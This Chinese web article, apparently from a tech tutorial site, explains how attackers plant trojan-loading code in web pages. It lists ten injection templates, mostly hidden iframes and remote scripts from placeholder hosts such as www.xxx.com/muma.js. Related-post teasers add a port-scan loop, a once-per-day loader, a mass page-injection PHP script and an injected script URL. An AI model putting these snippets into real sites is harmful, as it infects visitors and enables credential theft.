挂马代码 网页挂马分析

如今网民上网可算是提心吊胆,面对病毒,也许杀毒软件还能防止一二,但如果遇到网页中挂马行为,甚至直接将用户当前机所安装的杀毒软件直接强行关闭,那么其后果是不言而喻的。如今的网页有马行为也不像以前那么单一,甚至不出现下载提示,直接从后台开始下载运行其马,然后秘密的收集用户信息并返溃到恶意者手中。
    网马危害
    如果一台正常的网络服务器被恶意用户入侵,其网页被挂马,在一定程度上可以说是网页被篡改,其危害是巨大的,随着用户访问流量的增多,会造成此马的传播性越发增大,由于其隐蔽性比较强,导至很多杀毒软件没有及时更新的用户在不知不觉中深受其害。对于服务器而言,其一方面是带宽与系统资源的占用巨大,另一方面直接导致该服务器成为木马传播之源,成为傀儡帮凶,严重影响到网站的信誉。而对于受害网民来说,个人资料信息的安全将成为公众目标,其电子银行帐户和密码、游戏帐号和密码、邮箱帐户和密码、QQ/MSN 帐号和密码等都不再安全。

常见挂马手段
    目前,利用网页木马进行攻击已经成为流行的恶意用户攻击手段,应引起广大网民与网站的足够重视!下面列出网页挂马的几中常见类型:

一、body挂马:<body ></body>

二、框架挂马:<iframe src=地址 width=0 height=0></iframe>

三、js变形加密: <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>muma.txt可改成任意后缀。

四、css中挂马:body {background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

五、隐蔽挂马:top.document.body.innerHTML = top.document.body.innerHTML + 'rn<iframe src="http://www.xxx.com/muma.htm/"></iframe>'

六、js文件挂马: 首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js, 则JS挂马代码为<script language=javascript src=xxx.js></script>

七、图片伪装:
    <html>
    <iframe src="网马地址" height=0 width=0></iframe>
    <img src="图片地址"></center>
    </html>

八、javascript挂马:
    <SCRIPT language=javascript> 
    window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
    </script>

九、伪装调用:
    <frameset rows="444,0" cols="*">
    <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
    <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
    </frameset>

十、高级欺骗:
    <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
    <SCRIPT Language="JavaScript">
    function www_163_com ()
    {
    var url="网马地址";
    open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,
    resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
    }

以上几中虽然列出了常见的网页木马驻扎方式,但随着时间的推移,这些挂马方式将会演变成各种各样的形态,旨在盗取不同的机密与链接恶意用户指定的木马载有页,以达下载更多的木马病毒霍乱被感染的计算机,让其成为新的病毒木马载体源,从而为新一轮的感染创造条件。

(0)

相关推荐

  • 最新病毒之SXS病毒专杀方式,最近挂马严重

    [%repeat_0 match="/data/option"%] [%=@title%] [%=@count%]票 [[%=@percent%]%]  [%_repeat_0%] SXS.EXE这是一个盗取QQ帐号密码的木马病毒,特点是可以通过可移动磁盘传播.该病毒的主要危害是盗取QQ帐户和密码:该病毒还会结束大量反病毒软件,降低系统的安全等级.  中毒症状:电脑分区双击不能自动打开或者很难打开,用右键打开可以!这是最显见的症状!  解决方式:网上已经有很多手动删除的方式!  现在有

  • dos之for命令实现扫描网段的端口,用于辅助解决ARP挂马

    不需要任何工具,dos命令扫描一个网段的全部端口!  在win2000下开一个dos窗口,然后执行  for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389  这样192.168.0.x这个段的所有开放3389端口得主机都会暴露  这条命令执行后  会在任务栏开254个小窗口  然后telnet链接失败的窗口会在大约5秒后自动退出  剩下的窗口就是相对应开放端口的主机了  看一下小窗口的标题可以得知主机的ip地址  如

  • Asp常见挂马方式大总结

    一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 其中"地址"处可以输入恶意网站链接等 二:js文件挂马 只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等. 三:js变形加密 <SCRIPT language="J

  • 阻止网页挂马的若干工具小集合

    那么,除了在Web开发的时候注意以外,有什么有效的工具可以对抗SQL注入攻击? 今天,微软和惠普的安全部门合作发布了三个工具,分别是: 微软SQL注入攻击源码扫描器:Microsoft Source Code Analyzer for SQL Injection (MSCASI).这个工具给网站开发人员使用.是一个静态扫描ASP代码的工具,可以查找发现第一类和第二类的SQL注入攻击漏洞.工具下载地址: http://support.microsoft.com/kb/954476 惠普的 Scra

  • js cookies 常见网页木马挂马代码 24小时只加载一次

    复制代码 代码如下: <div style='display:none'> <script type="text/javascript"> function goad(){ var Then = new Date() Then.setTime(Then.getTime() + 2*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookier1

  • 网页挂马方式整理及详细介绍

    网页挂马方式 一:框架挂马 <iframe src=地址 width=0 height=0></iframe>  二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script>

  • 利用css实现挂马的代码

    body {  background-image: url('javascript:document.write("<script src=http://www.jb51.net/9xiao.js></script>")') } 9xiao.js内容是 document.write("<iframe src=你的网马 width=0 height=0></iframe>")

  • 数据库中的内容字段被挂马的替换方法 SQL注入

    清除了sqlsever中的一些挂马字段,现在总结sqlsever批量替换数据库挂马字段一文,希望可以帮助有需要的人. [处理方法] 1.先备份数据,防止删除挂马字段的时候,丢失数据: 2.对挂马的表中的字段text小于8000执行以下语句(网上的很多软件与方法都是针对text小于8000的,这个解决方法你可以参考) 代码如下: 如表news 字段context 挂马字段是 <Script Src=http://c.n%75clear3.com/css/c.js></Script>

  • 预防网页挂马的方法总结

    预防网页挂马的方法总结: 在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.本文主要介绍网页挂马的工作原理及种类.常见方式.执行方式.如何检测网页是否被挂马.如何清除网页木马.如何防止网页被挂马. 1:网页挂马工作原理的种类. (1)工作原理: 作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭

  • php下批量挂马和批量清马代码

    复制代码 代码如下: <?php function gmfun($path=".") { $d = @dir($path); while(false !== ($v = $d->read())) { if($v == "." || $v == "..") continue; $file = $d->path."/".$v; if(@is_dir($file)) { gmfun($file); } else {

  • 最新的无权限挂马方式

    还有在国外的一些机器上,什么权限都拿到了也不知道他怎么弄的,什么都不让写,好不容易写个文件没一会又改回去了,真的让人很!#$%%#%^#%^,据说就有一种软件能监视重要的文件,一旦发现更改就会给恢复过去,譬如他监视web目录的话我们就不能更改他网站的任何内容了.不过,看了很多大虾的文章,自己也略微研究了下,也总算琢磨点东西出来,不用写任何文件就可以实现将别人的页面涂改和大家经常传说的挂马等等后果,这里就给大家介绍下,那些只知道勤快的管理员也要小心了! 大家知道,我们浏览网站的时候都是服务器将信息

随机推荐